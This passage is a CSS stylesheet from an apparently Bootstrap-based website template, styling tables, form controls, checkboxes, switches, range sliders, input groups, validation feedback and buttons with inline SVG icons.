  --table-hover-bg: rgba(0, 0, 0, 0.075);
  width: 100%;
  margin-bottom: 1rem;
  color: var(--template-text-dark);
  vertical-align: top;
  border-color: #dee2e6;
}
.table > :not(caption) > * > * {
  padding: 0.75rem 1rem;
  background-color: var(--table-bg);
  border-bottom-width: 1px;
  box-shadow: inset 0 0 0 9999px var(--table-accent-bg);
}
.table > tbody {
  vertical-align: inherit;
}
.table > thead {
  vertical-align: bottom;
}
.table > :not(:last-child) > :last-child > * {
  border-bottom-color: #dee2e6;
}

.caption-top {
  caption-side: top;
}

.table-sm > :not(caption) > * > * {
  padding: 0.3rem 0.3rem;
}

.table-bordered > :not(caption) > * {
  border-width: 1px 0;
}
.table-bordered > :not(caption) > * > * {
  border-width: 0 1px;
}

.table-borderless > :not(caption) > * > * {
  border-bottom-width: 0;
}

.table-striped > tbody > tr:nth-of-type(odd) {
  --table-accent-bg: var(--table-striped-bg);
  color: var(--table-striped-color);
}

.table-active {
  --table-accent-bg: var(--table-active-bg);
  color: var(--table-active-color);
}

.table-hover > tbody > tr:hover {
  --table-accent-bg: var(--table-hover-bg);
  color: var(--table-hover-color);
}

.table-primary {
  --table-bg: #d4e1f1;
  --table-striped-bg: #c9d6e5;
  --table-striped-color: #000;
  --table-active-bg: #bfcbd9;
  --table-active-color: #000;
  --table-hover-bg: #c4d0df;
  --table-hover-color: #000;
  color: #000;
  border-color: #bfcbd9;
}

.table-secondary {
  --table-bg: #e0e2e4;
  --table-striped-bg: #d5d7d9;
  --table-striped-color: #000;
  --table-active-bg: #cacbcd;
  --table-active-color: #000;
  --table-hover-bg: #cfd1d3;
  --table-hover-color: #000;
  color: #000;
  border-color: #cacbcd;
}

.table-success {
  --table-bg: #dae5dd;
  --table-striped-bg: #cfdad2;
  --table-striped-color: #000;
  --table-active-bg: #c4cec7;
  --table-active-color: #000;
  --table-hover-bg: #cad4cc;
  --table-hover-color: #000;
  color: #000;
  border-color: #c4cec7;
}

.table-info {
  --table-bg: #d4e1f1;
  --table-striped-bg: #c9d6e5;
  --table-striped-color: #000;
  --table-active-bg: #bfcbd9;
  --table-active-color: #000;
  --table-hover-bg: #c4d0df;
  --table-hover-color: #000;
  color: #000;
  border-color: #bfcbd9;
}

.table-warning {
  --table-bg: #fff0d0;
  --table-striped-bg: #f2e4c6;
  --table-striped-color: #000;
  --table-active-bg: #e6d8bb;
  --table-active-color: #000;
  --table-hover-bg: #ecdec0;
  --table-hover-color: #000;
  color: #000;
  border-color: #e6d8bb;
}

.table-danger {
  --table-bg: #f3d4d4;
  --table-striped-bg: #e7c9c9;
  --table-striped-color: #000;
  --table-active-bg: #dbbfbf;
  --table-active-color: #000;
  --table-hover-bg: #e1c4c4;
  --table-hover-color: #000;
  color: #000;
  border-color: #dbbfbf;
}

.table-light {
  --table-bg: #f8f9fa;
  --table-striped-bg: #ecedee;
  --table-striped-color: #000;
  --table-active-bg: #dfe0e1;
  --table-active-color: #000;
  --table-hover-bg: #e5e6e7;
  --table-hover-color: #000;
  color: #000;
  border-color: #dfe0e1;
}

.table-dark {
  --table-bg: #212529;
  --table-striped-bg: #2c3034;
  --table-striped-color: #fff;
  --table-active-bg: #373b3e;
  --table-active-color: #fff;
  --table-hover-bg: #323539;
  --table-hover-color: #fff;
  color: #fff;
  border-color: #373b3e;
}

.table-responsive {
  overflow-x: auto;
  -webkit-overflow-scrolling: touch;
}

@media (max-width: 575.98px) {
  .table-responsive-sm {
    overflow-x: auto;
    -webkit-overflow-scrolling: touch;
  }
}
@media (max-width: 767.98px) {
  .table-responsive-md {
    overflow-x: auto;
    -webkit-overflow-scrolling: touch;
  }
}
@media (max-width: 991.98px) {
  .table-responsive-lg {
    overflow-x: auto;
    -webkit-overflow-scrolling: touch;
  }
}
@media (max-width: 1199.98px) {
  .table-responsive-xl {
    overflow-x: auto;
    -webkit-overflow-scrolling: touch;
  }
}
@media (max-width: 1399.98px) {
  .table-responsive-xxl {
    overflow-x: auto;
    -webkit-overflow-scrolling: touch;
  }
}
.form-label {
  margin-bottom: 0.5rem;
}

.col-form-label {
  padding-top: calc(0.5rem + 1px);
  padding-bottom: calc(0.5rem + 1px);
  margin-bottom: 0;
  font-size: inherit;
  line-height: 1.5;
}

.col-form-label-lg {
  padding-top: calc(0.5rem + 1px);
  padding-bottom: calc(0.5rem + 1px);
  font-size: 1.25rem;
}

.col-form-label-sm {
  padding-top: calc(0.25rem + 1px);
  padding-bottom: calc(0.25rem + 1px);
  font-size: 0.8rem;
}

.form-text {
  margin-top: 0.25rem;
  font-size: 0.875em;
  color: #666e76;
}

.form-control {
  display: block;
  width: 100%;
  padding: 0.5rem 1rem;
  font-size: 1rem;
  font-weight: 400;
  line-height: 1.5;
  color: var(--template-text-dark);
  background-color: #fff;
  background-clip: padding-box;
  border: 1px solid #cdcdcd;
  -webkit-appearance: none;
     -moz-appearance: none;
          appearance: none;
  border-radius: 0.25rem;
  transition: border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .form-control {
    transition: none;
  }
}
.form-control[type=file] {
  overflow: hidden;
}
.form-control[type=file]:not(:disabled):not([readonly]) {
  cursor: pointer;
}
.form-control:focus {
  color: var(--template-text-dark);
  background-color: #fff;
  border-color: #95b4db;
  outline: 0;
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 183, 0.25);
}
.form-control::-webkit-date-and-time-value {
  height: 1.5em;
}
.form-control::-webkit-input-placeholder {
  color: #666e76;
  opacity: 1;
}
.form-control::-moz-placeholder {
  color: #666e76;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #666e76;
  opacity: 1;
}
.form-control::-ms-input-placeholder {
  color: #666e76;
  opacity: 1;
}
.form-control::placeholder {
  color: #666e76;
  opacity: 1;
}
.form-control:disabled, .form-control[readonly] {
  background-color: #e8e8e8;
  opacity: 1;
}
.form-control::file-selector-button {
  padding: 0.5rem 1rem;
  margin: -0.5rem -1rem;
  -webkit-margin-end: 1rem;
          margin-inline-end: 1rem;
  color: var(--white);
  background-color: #132f53;
  pointer-events: none;
  border-color: inherit;
  border-style: solid;
  border-width: 0;
  border-inline-end-width: 1px;
  border-radius: 0;
  transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .form-control::file-selector-button {
    transition: none;
  }
}
.form-control:hover:not(:disabled):not([readonly])::file-selector-button {
  background-color: #122d4f;
}
.form-control::-webkit-file-upload-button {
  padding: 0.5rem 1rem;
  margin: -0.5rem -1rem;
  -webkit-margin-end: 1rem;
          margin-inline-end: 1rem;
  color: var(--white);
  background-color: #132f53;
  pointer-events: none;
  border-color: inherit;
  border-style: solid;
  border-width: 0;
  border-inline-end-width: 1px;
  border-radius: 0;
  -webkit-transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
  transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .form-control::-webkit-file-upload-button {
    -webkit-transition: none;
    transition: none;
  }
}
.form-control:hover:not(:disabled):not([readonly])::-webkit-file-upload-button {
  background-color: #122d4f;
}

.form-control-plaintext {
  display: block;
  width: 100%;
  padding: 0.5rem 0;
  margin-bottom: 0;
  line-height: 1.5;
  color: var(--template-text-dark);
  background-color: transparent;
  border: solid transparent;
  border-width: 1px 0;
}
.form-control-plaintext.form-control-sm, .form-control-plaintext.form-control-lg {
  padding-right: 0;
  padding-left: 0;
}

.form-control-sm {
  min-height: calc(1.5em + (0.5rem + 2px));
  padding: 0.25rem 0.5rem;
  font-size: 0.8rem;
  border-radius: 0.2rem;
}
.form-control-sm::file-selector-button {
  padding: 0.25rem 0.5rem;
  margin: -0.25rem -0.5rem;
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
}
.form-control-sm::-webkit-file-upload-button {
  padding: 0.25rem 0.5rem;
  margin: -0.25rem -0.5rem;
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
}

.form-control-lg {
  min-height: calc(1.5em + (1rem + 2px));
  padding: 0.5rem 1rem;
  font-size: 1.25rem;
  border-radius: 0.3rem;
}
.form-control-lg::file-selector-button {
  padding: 0.5rem 1rem;
  margin: -0.5rem -1rem;
  -webkit-margin-end: 1rem;
          margin-inline-end: 1rem;
}
.form-control-lg::-webkit-file-upload-button {
  padding: 0.5rem 1rem;
  margin: -0.5rem -1rem;
  -webkit-margin-end: 1rem;
          margin-inline-end: 1rem;
}

textarea.form-control {
  min-height: calc(1.5em + (1rem + 2px));
}
textarea.form-control-sm {
  min-height: calc(1.5em + (0.5rem + 2px));
}
textarea.form-control-lg {
  min-height: calc(1.5em + (1rem + 2px));
}

.form-control-color {
  max-width: 3rem;
  height: auto;
  padding: 0.5rem;
}
.form-control-color:not(:disabled):not([readonly]) {
  cursor: pointer;
}
.form-control-color::-moz-color-swatch {
  height: 1.5em;
  border-radius: 0.25rem;
}
.form-control-color::-webkit-color-swatch {
  height: 1.5em;
  border-radius: 0.25rem;
}

.form-select, .custom-select {
  display: block;
  width: 100%;
  padding: 0.5rem 3rem 0.5rem 1rem;
  -moz-padding-start: calc(1rem - 3px);
  font-size: 1rem;
  font-weight: 400;
  line-height: 1.5;
  color: var(--template-text-dark);
  background-color: var(--template-bg-light);
  background-image: url("../images/select-bg.svg");
  background-repeat: no-repeat;
  background-position: right 1rem center;
  background-size: 116rem;
  border: 1px solid #cdcdcd;
  border-radius: 0.25rem;
  transition: border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
  -webkit-appearance: none;
     -moz-appearance: none;
          appearance: none;
}
@media (prefers-reduced-motion: reduce) {
  .form-select, .custom-select {
    transition: none;
  }
}
.form-select:focus, .custom-select:focus {
  border-color: #95b4db;
  outline: 0;
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 183, 0.25);
}
.form-select[multiple], [multiple].custom-select, .form-select[size]:not([size="1"]), [size].custom-select:not([size="1"]) {
  padding-right: 1rem;
  background-image: none;
}
.form-select:disabled, .custom-select:disabled {
  background-color: #e8e8e8;
}
.form-select:-moz-focusring, .custom-select:-moz-focusring {
  color: transparent;
  text-shadow: 0 0 0 var(--template-text-dark);
}

.form-select-sm {
  padding-top: 0.25rem;
  padding-bottom: 0.25rem;
  padding-left: 0.5rem;
  font-size: 0.8rem;
}

.form-select-lg {
  padding-top: 0.5rem;
  padding-bottom: 0.5rem;
  padding-left: 1rem;
  font-size: 1.25rem;
}

.form-check {
  display: block;
  min-height: 1.5rem;
  padding-left: 1.5em;
  margin-bottom: 0.125rem;
}
.form-check .form-check-input {
  float: left;
  margin-left: -1.5em;
}

.form-check-input {
  width: 1em;
  height: 1em;
  margin-top: 0.25em;
  vertical-align: top;
  background-color: #fff;
  background-repeat: no-repeat;
  background-position: center;
  background-size: contain;
  border: 1px solid rgba(0, 0, 0, 0.25);
  -webkit-appearance: none;
     -moz-appearance: none;
          appearance: none;
  -webkit-print-color-adjust: exact;
          color-adjust: exact;
}
.form-check-input[type=checkbox] {
  border-radius: 0.25em;
}
.form-check-input[type=radio] {
  border-radius: 50%;
}
.form-check-input:active {
  -webkit-filter: brightness(90%);
          filter: brightness(90%);
}
.form-check-input:focus {
  border-color: #95b4db;
  outline: 0;
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 183, 0.25);
}
.form-check-input:checked {
  background-color: #2a69b7;
  border-color: #2a69b7;
}
.form-check-input:checked[type=checkbox] {
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 20 20'%3e%3cpath fill='none' stroke='%23fff' stroke-linecap='round' stroke-linejoin='round' stroke-width='3' d='M6 10l3 3l6-6'/%3e%3c/svg%3e");
}
.form-check-input:checked[type=radio] {
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3e%3ccircle r='2' fill='%23fff'/%3e%3c/svg%3e");
}
.form-check-input[type=checkbox]:indeterminate {
  background-color: #2a69b7;
  border-color: #2a69b7;
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 20 20'%3e%3cpath fill='none' stroke='%23fff' stroke-linecap='round' stroke-linejoin='round' stroke-width='3' d='M6 10h8'/%3e%3c/svg%3e");
}
.form-check-input:disabled {
  pointer-events: none;
  -webkit-filter: none;
          filter: none;
  opacity: 0.5;
}
.form-check-input[disabled] ~ .form-check-label, .form-check-input:disabled ~ .form-check-label {
  opacity: 0.5;
}

.form-switch {
  padding-left: 2.5em;
}
.form-switch .form-check-input {
  width: 2em;
  margin-left: -2.5em;
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3e%3ccircle r='3' fill='rgba%280, 0, 0, 0.25%29'/%3e%3c/svg%3e");
  background-position: left center;
  border-radius: 2em;
  transition: background-position 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .form-switch .form-check-input {
    transition: none;
  }
}
.form-switch .form-check-input:focus {
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3e%3ccircle r='3' fill='%2395b4db'/%3e%3c/svg%3e");
}
.form-switch .form-check-input:checked {
  background-position: right center;
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3e%3ccircle r='3' fill='%23fff'/%3e%3c/svg%3e");
}

.form-check-inline {
  display: inline-block;
  margin-right: 1rem;
}

.btn-check {
  position: absolute;
  clip: rect(0, 0, 0, 0);
  pointer-events: none;
}
.btn-check[disabled] + .btn, .btn-check:disabled + .btn {
  pointer-events: none;
  -webkit-filter: none;
          filter: none;
  opacity: 0.4;
}

.form-range {
  width: 100%;
  height: 1.5rem;
  padding: 0;
  background-color: transparent;
  -webkit-appearance: none;
     -moz-appearance: none;
          appearance: none;
}
.form-range:focus {
  outline: 0;
}
.form-range:focus::-webkit-slider-thumb {
  box-shadow: 0 0 0 1px #fff, 0 0 0 0.25rem rgba(42, 105, 183, 0.25);
}
.form-range:focus::-moz-range-thumb {
  box-shadow: 0 0 0 1px #fff, 0 0 0 0.25rem rgba(42, 105, 183, 0.25);
}
.form-range::-moz-focus-outer {
  border: 0;
}
.form-range::-webkit-slider-thumb {
  width: 1rem;
  height: 1rem;
  margin-top: -0.25rem;
  background-color: #2a69b7;
  border: 0;
  border-radius: 1rem;
  -webkit-transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
  transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
  -webkit-appearance: none;
          appearance: none;
}
@media (prefers-reduced-motion: reduce) {
  .form-range::-webkit-slider-thumb {
    -webkit-transition: none;
    transition: none;
  }
}
.form-range::-webkit-slider-thumb:active {
  background-color: #bfd2e9;
}
.form-range::-webkit-slider-runnable-track {
  width: 100%;
  height: 0.5rem;
  color: transparent;
  cursor: pointer;
  background-color: #dee2e6;
  border-color: transparent;
  border-radius: 1rem;
}
.form-range::-moz-range-thumb {
  width: 1rem;
  height: 1rem;
  background-color: #2a69b7;
  border: 0;
  border-radius: 1rem;
  -moz-transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
  transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
  -moz-appearance: none;
       appearance: none;
}
@media (prefers-reduced-motion: reduce) {
  .form-range::-moz-range-thumb {
    -moz-transition: none;
    transition: none;
  }
}
.form-range::-moz-range-thumb:active {
  background-color: #bfd2e9;
}
.form-range::-moz-range-track {
  width: 100%;
  height: 0.5rem;
  color: transparent;
  cursor: pointer;
  background-color: #dee2e6;
  border-color: transparent;
  border-radius: 1rem;
}
.form-range:disabled {
  pointer-events: none;
}
.form-range:disabled::-webkit-slider-thumb {
  background-color: #adb5bd;
}
.form-range:disabled::-moz-range-thumb {
  background-color: #adb5bd;
}

.form-floating {
  position: relative;
}
.form-floating > .form-control,
.form-floating > .form-select,
.form-floating > .custom-select {
  height: calc(3.5rem + 2px);
  line-height: 1.25;
}
.form-floating > label {
  position: absolute;
  top: 0;
  left: 0;
  height: 100%;
  padding: 1rem 1rem;
  pointer-events: none;
  border: 1px solid transparent;
  -webkit-transform-origin: 0 0;
          transform-origin: 0 0;
  transition: opacity 0.1s ease-in-out, -webkit-transform 0.1s ease-in-out;
  transition: opacity 0.1s ease-in-out, transform 0.1s ease-in-out;
  transition: opacity 0.1s ease-in-out, transform 0.1s ease-in-out, -webkit-transform 0.1s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .form-floating > label {
    transition: none;
  }
}
.form-floating > .form-control {
  padding: 1rem 1rem;
}
.form-floating > .form-control::-webkit-input-placeholder {
  color: transparent;
}
.form-floating > .form-control::-moz-placeholder {
  color: transparent;
}
.form-floating > .form-control:-ms-input-placeholder {
  color: transparent;
}
.form-floating > .form-control::-ms-input-placeholder {
  color: transparent;
}
.form-floating > .form-control::placeholder {
  color: transparent;
}
.form-floating > .form-control:not(:-moz-placeholder-shown) {
  padding-top: 1.625rem;
  padding-bottom: 0.625rem;
}
.form-floating > .form-control:not(:-ms-input-placeholder) {
  padding-top: 1.625rem;
  padding-bottom: 0.625rem;
}
.form-floating > .form-control:focus, .form-floating > .form-control:not(:placeholder-shown) {
  padding-top: 1.625rem;
  padding-bottom: 0.625rem;
}
.form-floating > .form-control:-webkit-autofill {
  padding-top: 1.625rem;
  padding-bottom: 0.625rem;
}
.form-floating > .form-select, .form-floating > .custom-select {
  padding-top: 1.625rem;
  padding-bottom: 0.625rem;
}
.form-floating > .form-control:not(:-moz-placeholder-shown) ~ label {
  opacity: 0.65;
  transform: scale(0.85) translateY(-0.5rem) translateX(0.15rem);
}
.form-floating > .form-control:not(:-ms-input-placeholder) ~ label {
  opacity: 0.65;
  transform: scale(0.85) translateY(-0.5rem) translateX(0.15rem);
}
.form-floating > .form-control:focus ~ label,
.form-floating > .form-control:not(:placeholder-shown) ~ label,
.form-floating > .form-select ~ label,
.form-floating > .custom-select ~ label {
  opacity: 0.65;
  -webkit-transform: scale(0.85) translateY(-0.5rem) translateX(0.15rem);
          transform: scale(0.85) translateY(-0.5rem) translateX(0.15rem);
}
.form-floating > .form-control:-webkit-autofill ~ label {
  opacity: 0.65;
  -webkit-transform: scale(0.85) translateY(-0.5rem) translateX(0.15rem);
          transform: scale(0.85) translateY(-0.5rem) translateX(0.15rem);
}

.input-group {
  position: relative;
  display: flex;
  flex-wrap: wrap;
  align-items: stretch;
  width: 100%;
}
.input-group > .form-control,
.input-group > .form-select,
.input-group > .custom-select {
  position: relative;
  flex: 1 1 auto;
  width: 1%;
  min-width: 0;
}
.input-group > .form-control:focus,
.input-group > .form-select:focus,
.input-group > .custom-select:focus {
  z-index: 3;
}
.input-group .btn {
  position: relative;
  z-index: 2;
}
.input-group .btn:focus {
  z-index: 3;
}

.input-group-text {
  display: flex;
  align-items: center;
  padding: 0.5rem 1rem;
  font-size: 1rem;
  font-weight: 400;
  line-height: 1.5;
  color: var(--white);
  text-align: center;
  white-space: nowrap;
  background-color: #132f53;
  border: 1px solid var(--template-bg-dark);
  border-radius: 0.25rem;
}

.input-group-lg > .form-control,
.input-group-lg > .form-select,
.input-group-lg > .custom-select,
.input-group-lg > .input-group-text,
.input-group-lg > .btn {
  padding: 0.5rem 1rem;
  font-size: 1.25rem;
  border-radius: 0.3rem;
}

.input-group-sm > .form-control,
.input-group-sm > .form-select,
.input-group-sm > .custom-select,
.input-group-sm > .input-group-text,
.input-group-sm > .btn {
  padding: 0.25rem 0.5rem;
  font-size: 0.8rem;
  border-radius: 0.2rem;
}

.input-group-lg > .form-select, .input-group-lg > .custom-select,
.input-group-sm > .form-select,
.input-group-sm > .custom-select {
  padding-right: 4rem;
}

.input-group:not(.has-validation) > :not(:last-child):not(.dropdown-toggle):not(.dropdown-menu),
.input-group:not(.has-validation) > .dropdown-toggle:nth-last-child(n+3) {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.input-group.has-validation > :nth-last-child(n+3):not(.dropdown-toggle):not(.dropdown-menu),
.input-group.has-validation > .dropdown-toggle:nth-last-child(n+4) {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.input-group > :not(:first-child):not(.dropdown-menu):not(.valid-tooltip):not(.valid-feedback):not(.invalid-tooltip):not(.invalid-feedback) {
  margin-left: -1px;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}

.valid-feedback {
  display: none;
  width: 100%;
  margin-top: 0.25rem;
  font-size: 0.875em;
  color: #457d54;
}

.valid-tooltip {
  position: absolute;
  top: 100%;
  z-index: 5;
  display: none;
  max-width: 100%;
  padding: 0.25rem 0.5rem;
  margin-top: 0.1rem;
  font-size: 0.8rem;
  color: #fff;
  background-color: rgba(69, 125, 84, 0.9);
  border-radius: 0.25rem;
}

.was-validated :valid ~ .valid-feedback,
.was-validated :valid ~ .valid-tooltip,
.is-valid ~ .valid-feedback,
.is-valid ~ .valid-tooltip {
  display: block;
}

.was-validated .form-control:valid, .form-control.is-valid {
  border-color: #457d54;
  padding-right: calc(1.5em + 1rem);
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3e%3cpath fill='%23457d54' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e");
  background-repeat: no-repeat;
  background-position: right calc(0.375em + 0.25rem) center;
  background-size: calc(0.75em + 0.5rem) calc(0.75em + 0.5rem);
}
.was-validated .form-control:valid:focus, .form-control.is-valid:focus {
  border-color: #457d54;
  box-shadow: 0 0 0 0.25rem rgba(69, 125, 84, 0.25);
}

.was-validated textarea.form-control:valid, textarea.form-control.is-valid {
  padding-right: calc(1.5em + 1rem);
  background-position: top calc(0.375em + 0.25rem) right calc(0.375em + 0.25rem);
}

.was-validated .form-select:valid, .was-validated .custom-select:valid, .form-select.is-valid, .is-valid.custom-select {
  border-color: #457d54;
}
.was-validated .form-select:valid:not([multiple]):not([size]), .was-validated .custom-select:valid:not([multiple]):not([size]), .was-validated .form-select:valid:not([multiple])[size="1"], .was-validated .custom-select:valid:not([multiple])[size="1"], .form-select.is-valid:not([multiple]):not([size]), .is-valid.custom-select:not([multiple]):not([size]), .form-select.is-valid:not([multiple])[size="1"], .is-valid.custom-select:not([multiple])[size="1"] {
  padding-right: 5.5rem;
  background-image: url("../images/select-bg.svg"), url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3e%3cpath fill='%23457d54' d='M2.3 6.73L.6 4.53c-.4-1.04.46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e");
  background-position: right 1rem center, center right 3rem;
  background-size: 116rem, calc(0.75em + 0.5rem) calc(0.75em + 0.5rem);
}
.was-validated .form-select:valid:focus, .was-validated .custom-select:valid:focus, .form-select.is-valid:focus, .is-valid.custom-select:focus {
  border-color: #457d54;
  box-shadow: 0 0 0 0.25rem rgba(69, 125, 84, 0.25);
}

.was-validated .form-check-input:valid, .form-check-input.is-valid {
  border-color: #457d54;
}
.was-validated .form-check-input:valid:checked, .form-check-input.is-valid:checked {
  background-color: #457d54;
}
.was-validated .form-check-input:valid:focus, .form-check-input.is-valid:focus {
  box-shadow: 0 0 0 0.25rem rgba(69, 125, 84, 0.25);
}
.was-validated .form-check-input:valid ~ .form-check-label, .form-check-input.is-valid ~ .form-check-label {
  color: #457d54;
}

.form-check-inline .form-check-input ~ .valid-feedback {
  margin-left: 0.5em;
}

.was-validated .input-group .form-control:valid, .input-group .form-control.is-valid,
.was-validated .input-group .form-select:valid,
.was-validated .input-group .custom-select:valid,
.input-group .form-select.is-valid,
.input-group .is-valid.custom-select {
  z-index: 1;
}
.was-validated .input-group .form-control:valid:focus, .input-group .form-control.is-valid:focus,
.was-validated .input-group .form-select:valid:focus,
.was-validated .input-group .custom-select:valid:focus,
.input-group .form-select.is-valid:focus,
.input-group .is-valid.custom-select:focus {
  z-index: 3;
}

.invalid-feedback {
  display: none;
  width: 100%;
  margin-top: 0.25rem;
  font-size: 0.875em;
  color: #c52827;
}

.invalid-tooltip {
  position: absolute;
  top: 100%;
  z-index: 5;
  display: none;
  max-width: 100%;
  padding: 0.25rem 0.5rem;
  margin-top: 0.1rem;
  font-size: 0.8rem;
  color: #fff;
  background-color: rgba(197, 40, 39, 0.9);
  border-radius: 0.25rem;
}

.was-validated :invalid ~ .invalid-feedback,
.was-validated :invalid ~ .invalid-tooltip,
.is-invalid ~ .invalid-feedback,
.is-invalid ~ .invalid-tooltip {
  display: block;
}

.was-validated .form-control:invalid, .form-control.is-invalid {
  border-color: #c52827;
  padding-right: calc(1.5em + 1rem);
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 12 12' width='12' height='12' fill='none' stroke='%23c52827'%3e%3ccircle cx='6' cy='6' r='4.5'/%3e%3cpath stroke-linejoin='round' d='M5.8 3.6h.4L6 6.5z'/%3e%3ccircle cx='6' cy='8.2' r='.6' fill='%23c52827' stroke='none'/%3e%3c/svg%3e");
  background-repeat: no-repeat;
  background-position: right calc(0.375em + 0.25rem) center;
  background-size: calc(0.75em + 0.5rem) calc(0.75em + 0.5rem);
}
.was-validated .form-control:invalid:focus, .form-control.is-invalid:focus {
  border-color: #c52827;
  box-shadow: 0 0 0 0.25rem rgba(197, 40, 39, 0.25);
}

.was-validated textarea.form-control:invalid, textarea.form-control.is-invalid {
  padding-right: calc(1.5em + 1rem);
  background-position: top calc(0.375em + 0.25rem) right calc(0.375em + 0.25rem);
}

.was-validated .form-select:invalid, .was-validated .custom-select:invalid, .form-select.is-invalid, .is-invalid.custom-select {
  border-color: #c52827;
}
.was-validated .form-select:invalid:not([multiple]):not([size]), .was-validated .custom-select:invalid:not([multiple]):not([size]), .was-validated .form-select:invalid:not([multiple])[size="1"], .was-validated .custom-select:invalid:not([multiple])[size="1"], .form-select.is-invalid:not([multiple]):not([size]), .is-invalid.custom-select:not([multiple]):not([size]), .form-select.is-invalid:not([multiple])[size="1"], .is-invalid.custom-select:not([multiple])[size="1"] {
  padding-right: 5.5rem;
  background-image: url("../images/select-bg.svg"), url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 12 12' width='12' height='12' fill='none' stroke='%23c52827'%3e%3ccircle cx='6' cy='6' r='4.5'/%3e%3cpath stroke-linejoin='round' d='M5.8 3.6h.4L6 6.5z'/%3e%3ccircle cx='6' cy='8.2' r='.6' fill='%23c52827' stroke='none'/%3e%3c/svg%3e");
  background-position: right 1rem center, center right 3rem;
  background-size: 116rem, calc(0.75em + 0.5rem) calc(0.75em + 0.5rem);
}
.was-validated .form-select:invalid:focus, .was-validated .custom-select:invalid:focus, .form-select.is-invalid:focus, .is-invalid.custom-select:focus {
  border-color: #c52827;
  box-shadow: 0 0 0 0.25rem rgba(197, 40, 39, 0.25);
}

.was-validated .form-check-input:invalid, .form-check-input.is-invalid {
  border-color: #c52827;
}
.was-validated .form-check-input:invalid:checked, .form-check-input.is-invalid:checked {
  background-color: #c52827;
}
.was-validated .form-check-input:invalid:focus, .form-check-input.is-invalid:focus {
  box-shadow: 0 0 0 0.25rem rgba(197, 40, 39, 0.25);
}
.was-validated .form-check-input:invalid ~ .form-check-label, .form-check-input.is-invalid ~ .form-check-label {
  color: #c52827;
}

.form-check-inline .form-check-input ~ .invalid-feedback {
  margin-left: 0.5em;
}

.was-validated .input-group .form-control:invalid, .input-group .form-control.is-invalid,
.was-validated .input-group .form-select:invalid,
.was-validated .input-group .custom-select:invalid,
.input-group .form-select.is-invalid,
.input-group .is-invalid.custom-select {
  z-index: 2;
}
.was-validated .input-group .form-control:invalid:focus, .input-group .form-control.is-invalid:focus,
.was-validated .input-group .form-select:invalid:focus,
.was-validated .input-group .custom-select:invalid:focus,
.input-group .form-select.is-invalid:focus,
.input-group .is-invalid.custom-select:focus {
  z-index: 3;
}

.btn {
  display: inline-block;
  font-weight: 400;
  line-height: 1.5;
  color: var(--template-text-dark);
  text-align: center;
  vertical-align: middle;
  cursor: pointer;
  -webkit-user-select: none;
     -moz-user-select: none;
      -ms-user-select: none;
          user-select: none;
  background-color: transparent;
  border: 1px solid transparent;
  padding: 0.5rem 1rem;
  font-size: 1rem;
  border-radius: 0.25rem;
  transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .btn {
    transition: none;
  }
}
.btn:hover {
  color: var(--template-text-dark);
}
.btn-check:focus + .btn, .btn:focus {
  outline: 0;
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 183, 0.25);
}
.btn:disabled, .btn.disabled, fieldset:disabled .btn {
  pointer-events: none;
  opacity: 0.4;
}

.btn-primary {
  color: #fff;
  background-color: #132f53;
  border-color: #132f53;
}
.btn-primary:hover {
  color: #fff;
  background-color: #102847;
  border-color: #0f2642;
}
.btn-check:focus + .btn-primary, .btn-primary:focus {
  color: #fff;
  background-color: #102847;
  border-color: #0f2642;
